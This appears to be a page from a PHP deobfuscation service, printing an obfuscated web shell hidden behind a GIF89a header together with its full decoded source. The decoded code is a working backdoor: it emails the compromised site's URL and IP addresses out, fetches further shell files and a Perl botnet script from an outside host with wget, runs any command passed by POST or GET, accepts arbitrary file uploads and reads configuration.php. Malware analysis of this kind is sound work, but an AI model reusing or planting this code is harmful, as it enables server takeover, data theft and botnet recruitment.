Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

GIF89aG <?php eval(gzinflate(str_rot13(base64_decode('rUt6Yts2EP4eIP+BSAPIUxPL7ZZniF/WLJEb..

Decoded Output download

error_reporting(0);
if (!isset($_SESSION['bajak'])) {
    $visitcount = 0;
    $web        = $_SERVER["HTTP_HOST"];
    $inj        = $_SERVER["REQUEST_URI"];
    $body       = "ada yang inject 
$web$inj";
    $safem0de   = @ini_get('safe_mode');
    if (!$safem0de) {
        $security = "SAFE_MODE = OFF";
    } else {
        $security = "SAFE_MODE = ON";
    }
    ;
    $serper   = gethostbyname($_SERVER['SERVER_ADDR']);
    $injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
    mail("[email protected]", "$body", "Hasil Bajakan http://$web$inj
$security
IP Server = $serper
 IP Injector= $injektor");
    $_SESSION['bajak'] = 0;
} else {
    $_SESSION['bajak']++;
}
;
if (isset($_GET['clone'])) {
    $source = $_SERVER['SCRIPT_FILENAME'];
    $desti  = $_SERVER['DOCUMENT_ROOT'] . "/tmp.phtml";
    rename($source, $desti);
}
if (isset($_GET['bajak'])) {
    system("wget http://konyaaltitaksi.com/wp-content/plugins/docs/id2.txt;lwp-download http://konyaaltitaksi.com/wp-content/plugins/docs/id2.txt;mv id2.txt tmp.phtml");
}
if (isset($_GET['komo'])) {
    system("wget http://konyaaltitaksi.com/wp-content/plugins/docs/id.zip;unzip id.zip;rm id.zip");
}
if (isset($_GET['botnet'])) {
    system("cd komo;chmod 0755 tools.txt;perl tools.txt");
}
if (isset($_GET['perl'])) {
    system("wget http://konyaaltitaksi.com/wp-content/plugins/docs/tools.sh;mv tools.sh komo.pl;cp komo.pl ../../../../../cgi-bin/;chmod 0755 komo.pl");
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {
    $security = "SAFE_MODE : OFF";
} else {
    $security = "SAFE_MODE : ON";
}
echo "<title>GoHack</title><br>";
echo "<font size=3 color=#FF00FF>Diatas Langit masih ada langit<br>";
echo "<font size=3 color=#FF00FF>Hacking Is Easy Jangan lupa visit : scanner.jomblo.asia :6667<br>";
echo "<font size=3 color=#FF00FF>#death - PowerServer Network<br><br>";
echo "<font size=2 color=#C0C0C0><b>" . $security . "</b><br>";
$cur_user = "(" . get_current_user() . ")";
echo "<font size=2 color=#C0C0C0><b>User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "</b><br>";
echo "<font size=2 color=#C0C0C0><b>Uname : " . php_uname() . "</b><br>";
function pwd() {
    $cwd = getcwd();
    if ($u = strrpos($cwd, '/')) {
        if ($u != strlen($cwd) - 1) {
            return $cwd . '/';
        } else {
            return $cwd;
        }
        ;
    } elseif ($u = strrpos($cwd, '\')) {
        if ($u != strlen($cwd) - 1) {
            return $cwd . '\';
        } else {
            return $cwd;
        }
        ;
    }
    ;
}
echo '<form method="POST" action=""><font size=2 color=#FF0000><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#FF0000><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#FF0000><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if (isset($_POST['submit'])) {
    $uploaddir = pwd();
    if (!$name = $_POST['newname']) {
        $name = $_FILES['userfile']['name'];
    }
    ;
    move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name);
    if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) {
        echo "Upload Failed";
    } else {
        echo "Upload Success to " . $uploaddir . $name . " :P ";
    }
}
if (isset($_POST['command'])) {
    $cmd = $_POST['cmd'];
    echo "<pre><font size=3 color=#FFF5EE>" . shell_exec($cmd) . "</font></pre>";
} elseif (isset($_GET['cmd'])) {
    $comd = $_GET['cmd'];
    echo "<pre><font size=3 color=#000000>" . shell_exec($comd) . "</font></pre>";
} elseif (isset($_GET['rf'])) {
    $rf = file_get_contents("../../../../../configuration.php");
    echo $rf;
} else {
    echo "<pre><font size=3 color=#FFF5EE>" . shell_exec('ls -la') . "</font></pre>";
}
echo "<center><font size=4 color=#FFF5EE>#death <font size=4 color=#FF0000>GoHack <font size=4 color=white>@ <font size=4 color=#FFF5EE>Team</center>";
?>
<link REL="SHORTCUT ICON" HREF="http://www.forum.romanisti-indonesia.com/Smileys/default/b_indonesia.gif"></link><body bgcolor="#000000"></body>

Did this file decode correctly?

Original Code

GIF89aG
<?php eval(gzinflate(str_rot13(base64_decode('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')))); ?>

Function Calls

gzinflate 1
str_rot13 1
base64_decode 1

Variables

None

Stats

MD5 1f8b1cfefeed809df852394e1f5e5720
Eval Count 1
Decode Time 101 ms